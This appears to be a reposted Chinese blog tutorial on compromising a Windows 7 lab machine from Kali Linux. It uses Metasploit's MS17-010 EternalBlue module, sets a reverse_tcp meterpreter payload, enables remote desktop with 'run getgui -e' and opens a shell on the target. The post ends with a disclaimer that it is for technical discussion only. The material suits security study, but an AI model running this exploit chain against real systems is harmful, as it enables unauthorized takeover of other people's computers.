当前位置:   article > 正文

针对基于Windows 7系统的一种攻击方法——在kali Linux里面利用Metasploit查询控制目标电脑终端_metasploit 打windows 操作系统

metasploit 打windows 操作系统

一、环境部署

需要准备一个kali Linux系统和一个win7系统

kali作为攻击机,win7作为靶机。两台主机必须在同一网段并互相ping通

kali的ip地址

win7的IP地址

Kali系统ping外网和win7

Win7系统ping通外网和kali

环境准备完成

二、开启数据库

su进入root权限

利用msf框架进行渗透,查看kali数据库是否开启:显示以下情况是未开启状态

service postgresql status

设置postgresql,开机自启:

update-rc.d postgresql enable

三、扫描端口

使用nmap对靶机win7系统进行扫描,确认445端口是否开启

nmap -O 192.168.17.217显示已开启

四、设置模块

输入msfconsole进入模块

初始化数据库  msfdb init

显示已经数据库似乎已经配置好了,跳过初始化

可能是之前做实验创建过吧

五、设置参数并开始攻击

查找漏洞ms17_010(永恒之蓝就是利用这个漏洞)。

search ms17_010

扫描漏洞   auxiliary/scanner/smb/smb_ms17_010

漏洞利用   exploit/windows/smb/ms17_010_eternalblue

 选择漏洞验证扫描工具并设置参数;

use auxiliary/scanner/smb/smb-ms17-010 利用扫描漏洞,开启模块

show options查看设置

set rhost 靶机ip192.168.17.217

exploit 运行

选择攻击模块并设置参数;

use exploit/windows/smb/ms17_010_eternalblue 选择模块

options 查看详细信息

这里报错的原因是因为没有设置载荷

set payload windows/x64/meterpreter/reverse_tcp //选择荷载

set rhost 192.168.17.217  靶机win7

set lhost 192.168.17.128  攻击机kali

六、攻击成功获取权限

exploit 运行攻击

获取靶机权限

run getgui -e  开启靶机3389端口(远程桌面用)

查看系统信息、提权添加账户以及获取密码等

输入shell进入靶机系统

chcp 65001  解决shellwindows终端乱码

查看靶机的地址

sysinfo  查看靶机系统信息(先从win7用户退出来:exit

至此利用Metasploit控制目标靶机win7成功渗透

此实验仅为技术讨论之用,任何未经授权的网络入侵行为都是非法的,并且会受到法律的严厉制裁。

学习渗透技术需要多看看《中华人民共和国网络安全法》

参考资料:

利用Metasploit控制目标电脑(Win7_x64系统)_metasploit能扫描到局域网中的win7系统吗-CSDN博客

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/766564
推荐阅读
相关标签
  

闽ICP备14008679号